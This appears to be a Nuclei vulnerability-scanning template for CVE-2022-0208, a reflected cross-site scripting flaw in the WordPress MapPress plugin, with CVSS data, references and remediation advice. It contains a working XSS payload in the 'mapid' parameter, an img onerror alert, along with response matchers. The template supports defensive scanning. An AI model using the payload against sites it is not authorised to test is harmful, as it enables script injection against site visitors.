id: CVE-2022-0208 info: name: WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting author: edoardottt severity: medium description: | WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 epss-score: 0.00106 epss-percentile: 0.42122 cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: mappresspro product: mappress framework: wordpress tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro http: - method: GET path: - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: word part: body words: - "" - "Bad mapid" condition: and - type: status status: - 200 # digest: 4b0a00483046022100b22a13c10631b7349f4edafe8cde23c314f46cc6c3661afdbef2141c2f9cab67022100adfeec912a26c02a2ba1982ccd3dddb34fab524142068da9e659428a5efd7e4d:922c64590222798bb761d5b6d8e72950